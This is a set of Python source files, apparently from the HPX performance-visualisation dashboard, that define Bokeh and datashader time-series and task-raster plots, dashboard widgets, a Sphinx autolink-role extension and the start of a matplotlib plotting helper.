(key, value) for key, value in kwargs.items() if key in get_figure_options()
)
self._data_sources = OrderedDict()
self._names = OrderedDict()
self._glyphs = OrderedDict()
# For shaded data
self._data = []
self._colors = []
self._color_ids = OrderedDict()
self._rebuild_figure = True
self._figure = None
self._reshade = True
self._x_range = None
self._y_range = None
self._is_shaded = shade
self._root = column(empty_placeholder())
self._show_legend = False
self._print_stats = print_stats
def add_line(self, countername, instance, collection=None, pretty_name=None, hold_update=False):
"""Adds a line to the plot.
Parameters
----------
countername
name of the counter
instance
instance (locality id, pool, thread id) given by format_instance()
collection
collection to plot from. If None, then it is the most recent run
pretty_name
name that will appear in the legend
hold_update
if True, the plot will not update itself. One has to manually call _make_figure()
"""
key = (countername, instance, collection, pretty_name)
if not pretty_name:
pretty_name = f"{countername};{instance};{collection}"
ds = DataSources().get_data(self._doc, countername, instance, collection)
self._data_sources[key] = ds
names = [name for _, _, _, name in self._data_sources.keys()]
self._colors = get_colors("Category20", names)
DataSources().listen_to(self._set_update, self._doc, countername, instance, collection)
if self._is_shaded:
self._reshade = True
else:
if not hold_update:
self._make_figure()
self._rebuild_figure = False
def remove_line(
self, countername, instance, collection=None, pretty_name=None, hold_update=False
):
"""Removes a line from the plot if it is present in the list.
Parameters
----------
countername
name of the counter
instance
instance (locality id, pool, thread id) given by format_instance()
collection
collection to plot from. If None, then it is the most recent run
pretty_name
name that will appear in the legend
hold_update
if True, the plot will not update itself. One has to manually call _make_figure()
"""
# TODO: does not update the plot correctly right now
key = (countername, instance, collection, pretty_name)
if key in self._data_sources:
del self._data_sources[key]
if key in self._glyphs:
del self._glyphs[key]
if not hold_update:
self._make_figure()
def remove_all(self):
""""""
self._data_sources.clear()
self._glyphs.clear()
self._colors = []
self._make_figure()
def update(self):
if self._reshade and self._is_shaded:
self._data = []
for key, ds in self._data_sources.items():
self._data.append(ds["data_source"].data)
# Rebuild the figure in case the user switched between shaded and non-shaded modes
if self._rebuild_figure:
self._make_figure()
self._rebuild_figure = False
self._reshade = False
if self._reshade and self._is_shaded:
self._build_shaded_data()
self._shaded_fig.set_data(
self._data,
self._colors,
self._x_range,
self._y_range,
)
self._reshade = False
# Get statistics of lines
if self._print_stats:
totals = []
means = []
for key in self._data_sources.keys():
countername, instance, collection, _ = key
total, mean = DataSources().get_stats(self._doc, countername, instance, collection)
totals.append(total)
means.append(mean)
if means:
total = sum(totals)
mean = sum(means)
print(f"Total: {total}, mean: {mean}, {len(totals)}")
def toggle_shade(self):
self._is_shaded = not self._is_shaded
self._rebuild_figure = True
def _build_shaded_data(self):
self._data = []
dataframes = {}
for _, _, collection, _ in self._data_sources.keys():
collection = DataSources().get_collection(collection)
if collection:
df = pd.DataFrame(collection.line_data(), copy=False)
df.rename(columns={0: "x", 1: "y", 2: "name"}, inplace=True)
dataframes[collection] = df
for countername, instance, collection, _ in self._data_sources.keys():
collection = DataSources().get_collection(collection)
if collection:
key = collection.line_to_hash(countername, instance)
df = dataframes[collection]
self._data.append(df[df["name"] == key])
else:
self._data.append({"x": [0], "y": [0]})
def _build_legend(self):
legend_items = []
for i, key in enumerate(self._glyphs.keys()):
_, _, _, name = key
legend_items.append(LegendItem(label=name, renderers=[self._glyphs[key]], index=i))
self._figure.add_layout(
Legend(items=legend_items, location="top_left", orientation="horizontal"), "above"
)
def _set_update(self):
self._reshade = True
def _make_figure(self):
if self._figure:
del self._figure
self._glyphs.clear()
if self._is_shaded:
self._build_shaded_data()
self._shaded_fig = ShadedTimeSeries(
self._doc,
self._data,
self._colors,
**self._defaults_opts,
)
self._figure = self._shaded_fig.layout()
else:
self._figure = Figure(**self._defaults_opts)
for key, ds in self._data_sources.items():
if key not in self._glyphs:
index = list(self._data_sources.keys()).index(key)
self._glyphs[key] = self._figure.line(
x=ds["x_name"],
y=ds["y_name"],
source=ds["data_source"],
line_color=self._colors[index],
line_width=2,
)
self._build_legend()
self._root.children[0] = self._figure
```
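A sketch of wiring a `TimeSeries` into a running Bokeh server document; it assumes the dashboard's `DataSources`/`DataAggregator` machinery is active, and the counter name and instance are placeholders:
```python
from bokeh.io import curdoc

doc = curdoc()
ts = TimeSeries(doc, shade=False, refresh_rate=500, plot_height=300)
ts.add_line(
    countername="threads/idle-rate",
    instance=("0", "default", "total"),  # (locality, pool, worker), see format_instance()
    pretty_name="idle rate (locality 0)",
)
doc.add_root(ts.layout())
```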
#### File: server/plots/raster.py
```python
import time
from functools import partial
import colorcet
from bokeh.models import ColumnDataSource, HoverTool
from bokeh.plotting import figure
from bokeh.events import Reset, MouseWheel, PanEnd, MouseMove
import numpy as np
import pandas as pd
import xarray as xr
import datashader as ds
import datashader.transfer_functions as tf
from .base import BaseElement, ThrottledEvent, get_figure_options
from ..utils import format_time
from ..worker import WorkerQueue
from ...common.constants import task_cmap
empty_task_mesh = [
[[0, 0, 0, 0]],
[[0, 0, 0]],
((0, 1), (0, 1)),
]
def _is_intersecting(interval1, interval2):
""""""
return interval1[0] <= interval2[1] and interval2[0] <= interval1[1]
def _is_data_in_range(df, x_col, y_col, x_range=None, y_range=None):
""""""
if not len(df[x_col]) or not len(df[y_col]):
return False
if not isinstance(df, dict):
df = pd.DataFrame(df)
if x_range and y_range:
idx_left = df[x_col].sub(x_range[0]).astype(float).abs().idxmin()
idx_right = df[x_col].sub(x_range[1]).astype(float).abs().idxmin()
if idx_left == idx_right:
return False
x_sub = df[x_col].loc[idx_left:idx_right]
y_sub = df[y_col].loc[idx_left:idx_right]
minx, miny = min(x_sub), min(y_sub)
maxx, maxy = max(x_sub), max(y_sub)
return _is_intersecting((minx, maxx), x_range) and _is_intersecting((miny, maxy), y_range)
elif x_range:
return _is_intersecting((min(df[x_col]), max(df[x_col])), x_range)
elif y_range:
return _is_intersecting((min(df[y_col]), max(df[y_col])), y_range)
else:
return True
def _normalize_ranges(x_range, y_range):
""""""
if x_range[0] == x_range[1]:
x_range = (max(x_range[0] - 1.0, 0.0), x_range[0] + 1.0)
if y_range[0] == y_range[1]:
y_range = (max(y_range[0] - 1.0, 0.0), y_range[0] + 1.0)
return x_range, y_range
def _compare_ranges(range1, range2, epsilon=1e-3):
"""Returns true if the both range are close enough (within a relative epsilon)."""
if not range1[0] or not range2[0]:
return False
return abs(range1[0] - range2[0]) < epsilon and abs(range1[1] - range2[1]) < epsilon
def shade_mesh(vertices, triangles, cmap=colorcet.rainbow, **kwargs):
""""""
if "plot_width" not in kwargs or "plot_height" not in kwargs:
raise ValueError("Please provide plot_width and plot_height for the canvas.")
if not isinstance(vertices, pd.DataFrame):
vertices = pd.DataFrame(vertices, columns=["x", "y", "z", "patch_id"], copy=False)
if not isinstance(triangles, pd.DataFrame):
triangles = pd.DataFrame(triangles, columns=["v0", "v1", "v2"], copy=False)
cvs = ds.Canvas(**kwargs)
img = cvs.trimesh(vertices, triangles, interpolate="nearest")
summary = ds.summary(id_info=ds.max("patch_id"))
summary.column = "z"
hover_agg = cvs.trimesh(vertices, triangles, agg=summary)
res = tf.shade(img, cmap=cmap, how="linear", span=[0, len(cmap)]), hover_agg
return res
def shade_line(data, colors=None, **kwargs):
""""""
if "plot_width" not in kwargs or "plot_height" not in kwargs:
raise ValueError("Please provide plot_width and plot_height for the canvas.")
if isinstance(data, (list, tuple)) and isinstance(colors, (list, tuple)):
if len(data) != len(colors):
raise ValueError("colors should have the same length as data.")
if isinstance(data, (dict, pd.DataFrame)):
data = [data]
if colors and isinstance(colors, str):
colors = [colors] * len(data)
if "x_range" not in kwargs or "y_range" not in kwargs:
x_range, y_range = get_ranges(data)
if "x_range" not in kwargs:
kwargs["x_range"] = x_range
if "y_range" not in kwargs:
kwargs["y_range"] = y_range
kwargs["x_range"], kwargs["y_range"] = _normalize_ranges(kwargs["x_range"], kwargs["y_range"])
cvs = ds.Canvas(**kwargs)
aggs = []
cs = []
for i, line in enumerate(data):
df = line
if not isinstance(line, pd.DataFrame):
df = pd.DataFrame(line).astype(float)
plot = True
if "x_range" in kwargs and "y_range" in kwargs:
plot = _is_data_in_range(df, "x", "y", kwargs["x_range"], kwargs["y_range"])
elif "x_range" in kwargs:
plot = _is_data_in_range(df, "x", "y", kwargs["x_range"])
elif "y_range" in kwargs:
plot = _is_data_in_range(df, "x", "y", y_range=kwargs["y_range"])
if len(df["x"]) == 0 or len(df["y"]) == 0:
plot = False
if plot:
aggs.append(cvs.line(df, "x", "y"))
if colors:
cs.append(colors[i])
if not aggs:
return xr.DataArray(np.zeros((kwargs["plot_height"], kwargs["plot_width"]), dtype=int))
if colors:
imgs = [tf.shade(aggs[i], cmap=[c]) for i, c in enumerate(cs)]
return tf.stack(*imgs)
else:
imgs = [tf.shade(aggs[i]) for i in range(len(data))]
return tf.stack(*imgs)
def get_ranges(data):
""""""
finfo = np.finfo(float)
x_range = (finfo.max, finfo.min)
y_range = (finfo.max, finfo.min)
if isinstance(data, (dict, pd.DataFrame)):
data = [data]
for line in data:
if not len(line["x"]) or not len(line["y"]):
continue
x_range = (min(min(line["x"]), x_range[0]), max(max(line["x"]), x_range[1]))
y_range = (min(min(line["y"]), y_range[0]), max(max(line["y"]), y_range[1]))
if x_range[0] == y_range[0] == finfo.max or x_range[1] == y_range[1] == finfo.min:
return (0.0, 1.0), (0.0, 1.0)
return x_range, y_range
def _is_equal(x, y, epsilon=1e-6):
return abs(x - y) < epsilon
class ShadedPlot(BaseElement):
""""""
def __init__(
self,
doc,
refresh_rate=500,
**kwargs,
):
""""""
super().__init__(doc, refresh_rate)
self._kwargs = kwargs
self._throttledEvent = ThrottledEvent(doc, 50)
# Variable for freezing the ranges if the user interacted with the plot
self._keep_range = False
self._current_x_range, self._current_y_range = self._calculate_ranges()
self._bokeh_x_range, self._bokeh_y_range = self._current_x_range, self._current_y_range
self._num_range_updates = 0
self._defaults_opts = dict(plot_width=800, plot_height=300, title="")
self._defaults_opts.update(
(key, value) for key, value in kwargs.items() if key in get_figure_options()
)
if "x_range" in self._defaults_opts:
self._current_x_range = self._defaults_opts["x_range"]
if "y_range" in self._defaults_opts:
self._current_y_range = self._defaults_opts["y_range"]
self._root = figure(**self._defaults_opts)
self._root.on_event(MouseWheel, self._freeze_ranges)
self._root.on_event(PanEnd, self._freeze_ranges)
self._root.x_range.range_padding = self._root.y_range.range_padding = 0
self._root.on_event(Reset, self._reset_fct)
def _reset_fct(self, event):
""""""
self._current_x_range, self._current_y_range = self._calculate_ranges()
self._reshade()
self._keep_range = False
self._last_reset = time.time()
def _freeze_ranges(self, *args):
self._keep_range = True
def _calculate_ranges(self):
return (0, 1), (0, 1)
def _reshade(self, immediate=False):
pass
def set_data(self):
pass
def update(self):
if self._keep_range:
x_range = self._root.x_range
y_range = self._root.y_range
x_range = (x_range.start, x_range.end)
y_range = (y_range.start, y_range.end)
if x_range == self._bokeh_x_range and y_range == self._bokeh_y_range:
self._num_range_updates += 1
else:
self._num_range_updates = 0
self._bokeh_x_range = x_range
self._bokeh_y_range = y_range
if self._num_range_updates > 2:
return
if x_range[0]:
self._current_x_range = x_range
if y_range[0]:
self._current_y_range = y_range
self._reshade(True)
def set_range(self, x_range=None, y_range=None):
if x_range:
self._current_x_range = x_range
if y_range:
self._current_y_range = y_range
self._reshade()
class ShadedTaskPlot(ShadedPlot):
""""""
def __init__(
self,
doc,
vertices,
triangles,
data_ranges,
names,
data,
refresh_rate=500,
cmap=task_cmap,
**kwargs,
):
self._vertices = vertices
self._triangles = triangles
self._data_ranges = data_ranges
self._names = names
self._data = data
self._hovered_mesh = empty_task_mesh[0:2] # For highlighting the hovered task on the plot
self._last_hovered = -1
self._throttled_mouseEvent = ThrottledEvent(doc)
super().__init__(doc, refresh_rate, **kwargs)
self.task_cmap = cmap
self._img, self._hover_agg = shade_mesh(
vertices,
triangles,
self.task_cmap,
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._ds = ColumnDataSource(
{
"img": [self._img.values],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
}
)
# When the user hovers with the mouse on a task, it becomes highlighted
self._hovered_img, _ = shade_mesh(
*self._hovered_mesh,
"black",
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._hovered_ds = ColumnDataSource(
{
"img": [self._hovered_img.values],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
}
)
self._hover_tool = HoverTool()
self._root.on_event(MouseMove, self._mouse_move_event)
self._root.add_tools(self._hover_tool)
self._root.image_rgba(image="img", source=self._ds, x="x", y="y", dw="dw", dh="dh")
self._root.image_rgba(image="img", source=self._hovered_ds, x="x", y="y", dw="dw", dh="dh")
def _calculate_ranges(self):
return self._data_ranges
def _mouse_move_event(self, event):
def update():
nonlocal event
# Convert plot coordinate to image coordinate
x = (
int(
self._defaults_opts["plot_width"]
* (event.x - self._current_x_range[0])
/ (self._current_x_range[1] - self._current_x_range[0])
)
- 1
)
y = (
int(
self._defaults_opts["plot_height"]
* (event.y - self._current_y_range[0])
/ (self._current_y_range[1] - self._current_y_range[0])
)
- 1
)
shape = self._hover_agg["id_info"].values.shape
tooltip = False
id_patch = -1
if x < shape[1] and y < shape[0]:
id_patch = self._hover_agg["id_info"].values[y, x]
if not np.isnan(id_patch):
id_patch = int(id_patch)
begin = self._data[id_patch, 1]
end = self._data[id_patch, 2]
digits = abs(int(np.ceil(np.log10(end - begin)))) + 3
duration = format_time(end - begin)
self._hover_tool.tooltips = f"""Name: <b><em>{self._names[id_patch]}</em></b><br />
Duration: {duration}<br />
Start: {np.round(begin, digits)}s<br />
End : {np.round(end, digits)}s"""
# Generate mesh for hovered image
self._hovered_mesh[0] = self._vertices[id_patch * 4 : (id_patch + 1) * 4]
self._hovered_mesh[1] = [[0, 1, 2], [0, 2, 3]]
tooltip = True
if not tooltip:
self._hover_tool.tooltips = None
self._hovered_mesh = empty_task_mesh[0:2]
id_patch = str(id_patch)
if id_patch != self._last_hovered:
self._reshade(only_hover=True)
self._last_hovered = id_patch
self._throttled_mouseEvent.add_event(update)
def _reshade(self, immediate=False, only_hover=False):
""""""
def push_to_datasource(ds, img):
ds.data = {
"img": [img.values],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
}
def update():
nonlocal only_hover
if not only_hover:
self._img, self._hover_agg = shade_mesh(
self._vertices,
self._triangles,
self.task_cmap,
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
if not only_hover:
self._doc.add_next_tick_callback(partial(push_to_datasource, self._ds, self._img))
self._hovered_img, _ = shade_mesh(
*self._hovered_mesh,
"black",
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._doc.add_next_tick_callback(
partial(push_to_datasource, self._hovered_ds, self._hovered_img)
)
if immediate:
WorkerQueue().put("task_raster", update)
else:
self._throttledEvent.add_event(lambda: WorkerQueue().put("task_raster", update))
def set_data(
self,
vertices,
triangles,
data_ranges,
names,
data,
x_range=None,
y_range=None,
):
""""""
self._vertices = vertices
self._triangles = triangles
self._data_ranges = data_ranges
self._names = names
self._data = data
_x_range, _y_range = self._calculate_ranges()
if not self._keep_range:
if x_range:
self._current_x_range = x_range
else:
self._current_x_range = _x_range
if y_range:
self._current_y_range = y_range
else:
self._current_y_range = _y_range
self._reshade(True)
class ShadedTimeSeries(ShadedPlot):
""""""
def __init__(
self,
doc,
data,
colors=None,
refresh_rate=500,
**kwargs,
):
""""""
self._colors = colors
self._data = data
super().__init__(doc, refresh_rate, **kwargs)
img = shade_line(
data,
colors,
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._ds = ColumnDataSource(
{
"img": [img.values],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
}
)
self._root.image_rgba(image="img", source=self._ds, x="x", y="y", dw="dw", dh="dh")
def _calculate_ranges(self):
return _normalize_ranges(*get_ranges(self._data))
def _reshade(self, immediate=False):
""""""
def gen():
img = shade_line(
self._data,
self._colors,
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._ds.data = {
"img": [img.values],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
}
if immediate:
gen()
else:
self._throttledEvent.add_event(gen)
def set_data(
self,
data,
colors=None,
x_range=None,
y_range=None,
):
""""""
self._data = data
_x_range, _y_range = self._calculate_ranges()
if not self._keep_range:
if x_range:
self._current_x_range = x_range
else:
self._current_x_range = _x_range
if y_range:
self._current_y_range = y_range
else:
self._current_y_range = _y_range
if colors:
self._colors = colors
self._reshade(True)
```
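`shade_line` can be exercised on its own with a synthetic line, without any Bokeh document; a minimal sketch:
```python
import numpy as np

xs = np.linspace(0, 10, 500)
img = shade_line({"x": xs, "y": np.sin(xs)}, colors="steelblue",
                 plot_width=400, plot_height=200)
print(img.shape)  # (200, 400) RGBA raster as an xarray DataArray
```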
#### File: server/plots/tasks.py
```python
from bokeh.layouts import column
from bokeh.models import MultiChoice # , HoverTool
from .base import BaseElement, get_figure_options
from ..data import DataSources
from .raster import ShadedTaskPlot, empty_task_mesh
from ..widgets import BaseWidget
from ...common.constants import task_cmap
class FilterWidget(BaseWidget):
def __init__(self, doc, callback, refresh_rate=500, collection=None, **kwargs):
super().__init__(
doc, callback=callback, refresh_rate=refresh_rate, collection=collection, **kwargs
)
self._choices = []
self._root = MultiChoice(options=self._choices, title="Filter tasks")
self._root.on_change("value", self._on_change)
def _on_change(self, attr, old, new):
self._callback(new)
def set_choices(self, choices):
if choices != self._choices:
self._choices = choices
self._root.options = list(self._choices)
class TasksPlot(BaseElement):
def __init__(
self,
doc,
locality="0",
window_size=10,
worker="*",
collection=None,
refresh_rate=500,
cmap=task_cmap,
**kwargs,
):
""""""
super().__init__(doc, refresh_rate, collection)
self._locality = locality
self._last_run = -1
self._task_names = set()
self._filter_list = []
self._locality = "0"
# Make plot and figure
defaults_opts = dict(
title="Task plot",
tools="save,reset,xwheel_zoom,xpan",
toolbar_location="above",
x_axis_label="Time (s)",
y_axis_label="Worker ID",
plot_width=800,
plot_height=600,
)
defaults_opts.update(
(key, value) for key, value in kwargs.items() if key in get_figure_options()
)
self._num_points = 0
self._figure = ShadedTaskPlot(
doc,
*empty_task_mesh,
[],
[],
refresh_rate=refresh_rate,
cmap=cmap,
**defaults_opts,
)
self._filter_choice = FilterWidget(doc, self.set_filter_list, collection=collection)
# Right now, filtering is not implemented
self._root = column(self._figure.layout()) # , self._filter_choice.layout())
def set_filter_list(self, filters):
"""Sets a filter to show only particular tasks"""
if isinstance(filters, str):
self._filter_list = [filters]
elif isinstance(filters, list):
self._filter_list = filters
self._num_points = -1
def _update_data(self):
""""""
collection = DataSources().get_collection(self._collection)
if not collection:
return
names = collection.get_task_names(self._locality)
if names != self._task_names:
self._task_names = names
self._filter_choice.set_choices(names)
verts, tris, data_ranges = collection.task_mesh_data(self._locality)
task_data, names = collection.task_data(self._locality)
if len(verts) != self._num_points:
self._figure.set_data(verts, tris, data_ranges, names, task_data)
self._num_points = len(verts)
def set_instance(self, locality):
self._locality = locality
self._num_points = -1
self._update_data()
def update(self):
super().update()
self._update_data()
```
#### File: server/widgets/widgets.py
```python
import copy
from datetime import datetime
import json
from bokeh.layouts import column, row
from bokeh.models.widgets import Button, Div, Toggle, TextAreaInput
from .base import BaseWidget, empty_placeholder
from ..plots import generator
from .select import DataCollectionSelect, SelectCustomLine
from ...common.logger import Logger
from ..data import DataAggregator, from_instance
logger = Logger()
class CustomCounterWidget(BaseWidget):
"""Produces a widget for plotting any counters"""
def __init__(self, doc, refresh_rate=1000, collection=None, **kwargs):
"""Produces a widget that allows the user to add / remove plots for any
counters from any collection
Arguments
---------
doc : Bokeh Document
bokeh document for auto-updating the widget
refresh_rate : int
refresh rate at which the widget refreshes and checks for new data collections (in ms)
**kwargs
arguments for the bokeh Select widget
"""
super().__init__(doc, refresh_rate=refresh_rate, collection=collection, **kwargs)
self._defaults_opts = dict(plot_width=800, plot_height=300)
self._defaults_opts.update((key, value) for key, value in kwargs.items())
self._lines = {}
self._lines_info = set()
self._line_counter = 0
# Buttons for editing the lines
self._add_line_b = Button(label="+", width=40)
self._add_line_b.on_click(self._add_line)
# Toggle button for the shading of the plots
self._shade_b = Toggle(label="Toggle plot shading", width=150)
self._shade_b.on_click(self._toggle_shade)
# Buttons for adding and removing plots
self._add_plot_b = Button(label="+", width=40)
self._add_plot_b.on_click(self._add_plot)
self._remove_plot_b = Button(label="-", width=40)
self._remove_plot_b.on_click(self._remove_plot)
# For editing the lines
self._edit_button = Toggle(label="Edit lines", width=100)
self._edit_button.on_click(self._toggle_edit)
self._json_input = TextAreaInput(
title="Export / inport widget:", width=500, max_length=20000
)
self._json_update_button = Button(label="Update from input", width=150)
self._json_update_button.on_click(self._set_from_input)
self._save_button = Button(label="Save state of widget to session", width=170)
self._save_button.on_click(self._save_widget)
self._root = column(
row(
Div(text="Add or remove plots:"),
self._remove_plot_b,
self._add_plot_b,
self._edit_button,
self._shade_b,
self._save_button,
),
empty_placeholder(),
empty_placeholder(),
)
self._plots = []
self._add_plot()
# If there is a saved state in the session of the widget
json_txt = DataAggregator().get_custom_widget_config()
if json_txt:
self.from_json(json_txt)
def _remove_line(self, idx):
del self._lines[idx]
self._update_line_widget()
def _add_line(self, update=True):
plots_text = [f"Plot {i + 1}" for i, _ in enumerate(self._plots)]
self._line_counter += 1
self._lines[self._line_counter] = SelectCustomLine(
self._doc,
self._line_counter,
plots_text,
self._remove_line,
)
if update:
self._update_line_widget()
def _toggle_shade(self, shade):
for plot in self._plots:
plot.toggle_shade()
def _save_widget(self):
DataAggregator().set_custom_widget_config(json.loads(self.to_json()))
def _update_plots(self):
plots = [plot.layout() for plot in self._plots]
self._root.children[2] = column(*plots)
# Update the lines with the available plots
plots_text = [f"Plot {i + 1}" for i, _ in enumerate(self._plots)]
for line in self._lines.values():
line.set_plots(plots_text)
def _update_line_widget(self):
lines = [line.layout() for line in self._lines.values()]
self._root.children[1] = column(
row(self._json_input, self._json_update_button),
row(self._add_line_b, Div(text="Add line")),
*lines,
)
def _toggle_edit(self, edit):
if edit:
self._update_line_widget()
else:
self._root.children[1] = empty_placeholder()
def _add_plot(self):
opts = copy.deepcopy(self._defaults_opts)
self._plots.append(
generator.TimeSeries(
self._doc,
refresh_rate=self._refresh_rate,
title=f"Plot {len(self._plots) + 1}",
**opts,
)
)
self._update_plots()
def _set_from_input(self):
self._toggle_edit(False)
self._edit_button.active = False
self.from_json(self._json_input.value)
def to_json(self):
"""Converts the state of the widget (number of plots, lines) to json"""
json_dict = {"num_plots": len(self._plots), "lines": []}
for plot_id, _, countername, instance, name in self._lines_info:
json_dict["lines"].append(
{"plot_id": plot_id, "countername": countername, "instance": instance, "name": name}
)
return json.dumps(json_dict)
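# Illustrative shape of the exported JSON (the counter name and instance
# encoding below are hypothetical; "instance" is whatever from_instance()
# understands): {"num_plots": 1, "lines": [{"plot_id": 1,
# "countername": "/threads/count/cumulative", "instance": [...], "name": null}]}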
def from_json(self, json_txt):
"""Takes a json as input and generates the corresponding plots and widgets.
Returns True if successful, False otherwise."""
json_dict = {}
try:
json_dict = json.loads(json_txt.rstrip())
except json.decoder.JSONDecodeError as e:
logger.error(f"JSON decode error: {e.msg}")
if "lines" not in json_dict:
return False
num_plots = 1
if "num_plots" in json_dict:
num_plots = json_dict["num_plots"]
# Remove all the lines
self._lines.clear()
# Set the correct number of plots
if num_plots > len(self._plots):
for _ in range(num_plots - len(self._plots)):
self._add_plot()
elif num_plots < len(self._plots):
for _ in range(len(self._plots) - num_plots):
self._remove_plot()
for line in json_dict["lines"]:
if not isinstance(line, dict):
return False
if (
"plot_id" not in line
or "countername" not in line
or "instance" not in line
or "name" not in line
):
return False
if not from_instance(tuple(line["instance"])):
return False
locality_id, pool, thread_id = from_instance(line["instance"])
self._add_line(False)
self._lines[self._line_counter].set_properties(
line["plot_id"],
None,
line["countername"],
locality_id,
pool,
thread_id,
line["name"],
)
return True
def update(self):
lines = set()
for line in self._lines.values():
lines.add(line.properties())
deleted_lines = self._lines_info.difference(lines)
new_lines = lines.difference(self._lines_info)
for plot_id, collection, countername, instance, name in deleted_lines:
if len(self._plots) >= plot_id:
self._plots[plot_id - 1].remove_line(countername, instance, collection, name)
for plot_id, collection, countername, instance, name in new_lines:
self._plots[plot_id - 1].add_line(countername, instance, collection, name)
self._lines_info = lines
self._json_input.value = self.to_json()
def _remove_plot(self):
if len(self._plots) == 1:
return
del self._plots[-1]
self._update_plots()
class DataCollectionWidget(BaseWidget):
"""Produces a widget for selecting current and past data collection instances"""
def __init__(self, doc, callback, refresh_rate=500, **kwargs):
"""Produces a widget that shows all the current and past data collection instances
in the form of a Select.
Arguments
---------
doc : Bokeh Document
bokeh document for auto-updating the widget
callback : function(collection: DataCollection)
callback for notifying when the user selects a certain data collection
refresh_rate : int
refresh rate at which the Select refreshes and checks for new data collections (in ms)
**kwargs
arguments for the bokeh Select widget
"""
super().__init__(doc, callback, refresh_rate=refresh_rate, **kwargs)
self._selected_collection = None
self._select = DataCollectionSelect(doc, self._set_collection, refresh_rate=refresh_rate)
self._div = Div(text="<b>No data available</b>")
self._root = column(self._select.layout(), self._div)
def _set_collection(self, collection):
""""""
self._selected_collection = collection
self._callback(collection)
self.update()
def update(self):
super().update()
collection = None
most_recent_flag = False
if not self._selected_collection:
most_recent_flag = True
collection = DataAggregator().get_live_collection()
else:
collection = self._selected_collection
if collection:
collection_list = DataAggregator().data
index = collection_list.index(collection)
collection = collection_list[index]
# Title of the run
title = f"Run #{index}"
if DataAggregator().get_current_run() == collection:
if most_recent_flag:
title += " (most recent, live)"
else:
title += " (live)"
elif most_recent_flag:
title += " (most recent)"
# Timings of the run
begin_time = datetime.fromtimestamp(int(collection.start_time))
time_info = f"<em>Start</em>: {begin_time}<br />"
if collection.end_time:
end_time = datetime.fromtimestamp(int(collection.end_time))
time_info += f"<em>End</em>: {end_time}"
# Num threads and localities
localities = collection.get_localities()
num_workers = 0
if localities:
num_workers = collection.get_num_worker_threads(localities[0])
instance_info = ""
if len(localities) == 1:
instance_info += "1 locality"
else:
instance_info += f"{len(localities)} localities"
instance_info += "<br />"
if num_workers == 1:
instance_info += "1 thread per locality"
else:
instance_info += f"{num_workers} threads per locality"
text = f"""<span class="run_summary"><h3 class="run_title">{title}</h3><br />
{time_info}<br />
{instance_info}</span>"""
if text != self._div.text:
self._div.text = text
``` |
{
"source": "jokteur/hpx",
"score": 2
} |
#### File: sphinx/extensions/sphinx-hpx.py
```python
from docutils import nodes
def setup(app):
app.add_role('hpx-issue', autolink('https://github.com/STEllAR-GROUP/hpx/issues/%s', "Issue #"))
app.add_role('hpx-pr', autolink('https://github.com/STEllAR-GROUP/hpx/pull/%s', "PR #"))
app.add_role('cppreference-header', autolink('http://en.cppreference.com/w/cpp/header/%s'))
app.add_role('cppreference-algorithm', autolink('http://en.cppreference.com/w/cpp/algorithm/%s'))
app.add_role('cppreference-memory', autolink('http://en.cppreference.com/w/cpp/memory/%s'))
app.add_role('cppreference-container', autolink('http://en.cppreference.com/w/cpp/container/%s'))
def autolink(pattern, prefix=''):
def role(name, rawtext, text, lineno, inliner, options={}, content=[]):
url = pattern % (text,)
node = nodes.reference(rawtext, prefix + text, refuri=url, **options)
return [node], []
return role
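# Hedged usage sketch (not part of the original extension; the issue and PR
# numbers are placeholders): once setup() has registered the roles above,
# reStructuredText in the docs can write e.g.
#
#   See :hpx-issue:`1234` and :hpx-pr:`5678`, or link headers with
#   :cppreference-header:`vector`.
#
# and each role expands to a hyperlink built from its URL pattern.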
```
#### File: network/network_storage/plot_utils.py
```python
import optparse
import math
import itertools
import matplotlib
#----------------------------------------------------------------------------
# Arguments and help
parser = optparse.OptionParser()
parser.add_option("--fig-size", type = "string", default = None)
parser.add_option("--show", action = "store_true", dest = "show_graph", default = False)
parser.add_option("--verbose", action = "store_true", default = False)
parser.add_option("--quiet", action = "store_true", default = False)
parser.add_option("--title", action = "store", dest = "title", default = False)
options, args = parser.parse_args()
#----------------------------------------------------------------------------
# convenience definitions to loop over all marker/colour styles
# if we have a lot of lines on the same graph
colours = ('r','g','b','c','y','m','k')
markers = ('+', '.', 'o', '*', '^', 's', 'v', ',', '<', '>', '8', 's', 'p', 'h', 'H', 'D', 'd')
filled_markers = ('o', 'v', '^', '<', '>', '8', 's', 'p', '*', 'h', 'H', 'D', 'd')
#----------------------------------------------------------------------------
if (not options.show_graph) :
matplotlib.use('SVG')
# this import must come after the use() call above
import matplotlib.pyplot as plt
#----------------------------------------------------------------------------
# setup default size of plot if user didn't pass fig_size command line option
try :
size = list(map(float, options.fig_size.split(',')))
if len(size) == 2 :
print("found size ", size)
options.fig_size = (size, [0.1, 0.1, 0.85, 0.85])
elif len(size) == 6 :
options.fig_size = (size[0:2], size[2:6])
else :
raise ValueError("--fig-size must be a string of 2 or 6 numbers")
except :
